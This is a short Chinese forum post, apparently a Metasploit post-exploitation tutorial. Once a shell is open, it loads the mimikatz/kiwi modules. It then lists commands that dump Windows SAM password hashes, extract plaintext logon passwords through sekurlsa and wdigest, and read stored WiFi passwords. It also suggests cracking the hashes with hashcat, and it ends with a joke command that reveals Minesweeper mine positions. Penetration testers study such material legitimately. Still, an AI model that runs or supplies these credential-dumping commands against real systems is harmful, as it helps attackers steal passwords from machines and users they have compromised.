跳转到帖子

recommended_posts

发布于
  • Members

利用msf获得系统shell后,就完了? no~ 我们的渗透之路才刚刚开始。系统提权,权限维持,这些都是最基本的操作,除了这些还有那些好玩的呢?
msf渗透测试

获取明文密码

如下,我们在msf中获得shell后,载入mimikatz模块load mimikatz
load mimikatz
这里提示,需要载入kiwi我们再次载入
load kiwi
获取系统hash值

mimikatz_command -f samdump::hashes

f0bb20c58c25dca7288b4fa087bb6ee8-blogsy
参数说明:
user:用户名
NTLM:hash值(如果获取明文失败,我们可以直接利用hashcat暴力破解)
获取密码明文

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

fcb861e30263a8dae8e13c1015581d21-blogsy

获取目标WiFi密码

wifi_list_shared

wifipass

获取扫雷的位置

mimikatz_command -f winmine::infos

  • 查看数 703
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…